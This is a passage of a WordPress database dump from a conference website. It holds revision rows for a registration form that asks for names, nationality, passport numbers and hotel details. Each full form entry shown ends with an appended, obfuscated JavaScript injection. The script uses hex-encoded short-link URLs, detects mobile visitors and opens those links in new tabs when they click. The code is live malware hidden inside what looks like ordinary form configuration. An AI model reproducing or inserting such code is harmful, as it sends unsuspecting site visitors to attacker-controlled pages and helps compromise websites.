shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"form_tags\":[]},\"meta\":{\"template\":\"be32b8cc1eb80419086b4b282acf6d4b\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','conference','','inherit','closed','closed','','3318-revision-v1','','','2023-08-20 22:54:27','2023-08-20 22:54:27','',3318,'https://gsw2023.com/?p=5358',0,'revision','',0),
(5359,1,'2023-08-20 22:56:13','2023-08-20 22:56:13','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Nationality\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"number\",\"label\":\"Passport No.\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"text\",\"label\":\"Hotel accommodation in Cairo\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Comment or Message\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"text\",\"label\":\"Affiliation\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":9,\"settings\":{\"form_title\":\"Please Fill Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Please Fill Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:56:13','2023-08-20 22:56:13','',5345,'https://gsw2023.com/?p=5359',0,'revision','',0),
(5360,1,'2023-08-20 22:56:27','2023-08-20 22:56:27','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"text\",\"label\":\"Affiliation\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Nationality\",\"description\":\"\",